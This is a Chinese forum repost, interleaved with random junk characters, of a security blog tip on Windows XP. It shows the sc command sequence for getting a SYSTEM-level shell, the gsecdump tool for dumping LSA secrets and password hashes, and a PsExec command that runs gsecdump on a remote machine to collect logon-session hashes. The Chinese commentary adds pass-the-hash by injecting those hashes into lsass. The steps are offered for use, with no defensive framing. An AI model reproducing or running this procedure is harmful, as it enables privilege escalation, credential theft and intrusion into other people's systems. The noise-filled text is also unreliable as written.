o get a DOS Prompt as NT system:; d8 n. j% q i4 q* {2 F& R$ i8 X
4 w7 r' G' W( S. x
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact4 p7 U0 K9 n5 Z I
[SC] CreateService SUCCESS+ J) `4 Q+ `. q* N! O! i% t
; N6 _6 k! w8 VC:\>sc start shellcmdline
! i8 ]8 Z! L: L$ h- f% h, x7 H# t[SC] StartService FAILED 1053:5 Q! i: ~, a& D" ?* E- I. y1 D0 X/ {
- m4 z8 D: Q g: [" c
The service did not respond to the start or control request in a timely fashion." X% j" i% S7 x
N' I+ ]/ i3 o% h$ Z5 WC:\>sc delete shellcmdline' z- W8 t0 i8 F: Z/ Q5 H1 D; z, g8 v$ A+ @
[SC] DeleteService SUCCESS" |$ \( P. p0 ?! z, d
: C2 r6 A6 ?+ w3 Y8 p
------------
7 Q1 o! e- @0 @6 E3 D- ?" F$ Q) s% ]2 t' h+ D, j
Then in the new DOS window:
1 X% x& w0 }0 r& Q; Y. [ x! t: m% a
Microsoft Windows XP [Version 5.1.2600]
n) ?$ F4 o+ h$ Q* C7 M4 H0 W% |(C) Copyright 1985-2001 Microsoft Corp." `" X, H2 ^# y' d7 @
; S4 B, K8 _9 T0 [( F
C:\WINDOWS\system32>whoami2 s( m* L) q$ Z: ~
NT AUTHORITY\SYSTEM
6 q6 v# b9 S* E% P9 d$ N( i- j! c( B3 b3 u5 H* J$ A4 q0 G( [* T
C:\WINDOWS\system32>gsecdump -h
/ l* @$ H F3 N: I# {% C7 @gsecdump v0.6 by Johannes Gumbel (链接标记[email protected])9 O. ~' H$ }) A" P* l' K& M" c
usage: gsecdump [options]
( R$ }/ @+ f* T/ k, e* i" P1 u2 L }4 J$ u0 D
options:
0 I' i) G# Y4 f& B-h [ --help ] show help
6 _9 q" N$ C* W* c9 c5 M; j9 F-a [ --dump_all ] dump all secrets7 t0 T8 e. Z* b$ l/ L3 L: y. J2 k6 |
-l [ --dump_lsa ] dump lsa secrets
( j! D8 l8 y2 P, p1 p1 U-w [ --dump_wireless ] dump microsoft wireless connections
' q7 @% x5 L. O0 a1 F, l, X-u [ --dump_usedhashes ] dump hashes from active logon sessions
0 V2 h: V1 B3 @" Q, G-s [ --dump_hashes ] dump hashes from SAM/AD
( G& O3 ~8 T: Q2 x* b. x
1 q' ^- s& \% u9 OAlthough I like to use:- f& c' j, ?8 t1 x5 u# H. D. ? `* J
$ Q" k8 B3 A; V" {. t+ S3 [
PsExec v1.83 - Execute processes remotely
1 U: B5 @; \8 R5 R( \# n/ _Copyright (C) 2001-2007 Mark Russinovich, }1 y/ }: N$ W/ [, M. \9 C3 \
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
1 i* A% o0 J0 G1 N# }. `7 o @7 E6 y: X
6 o8 M9 @" V" C( ^7 n$ ?) OC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT* ^8 s9 r0 W/ {$ b. A+ a( X9 A
/ {' G, _; s& H1 P/ b
to get the hashes from active logon sessions of a remote system.
M( H4 a2 Y! h( |' f( c }, c0 ~& W8 G
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.9 i2 |' \5 X& u2 H# e
1 L& e. _$ d, i9 {5 w1 {% H1 w
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.5 ?0 A$ X) b' Q- T6 H8 W
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]# e! t: D7 p$ T' }2 Z
( k. {$ y/ {& y我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。 A2 H' |! U1 w) z) s
|
发表于 2012-11-6 21:09:29
收藏
分享
支持
反对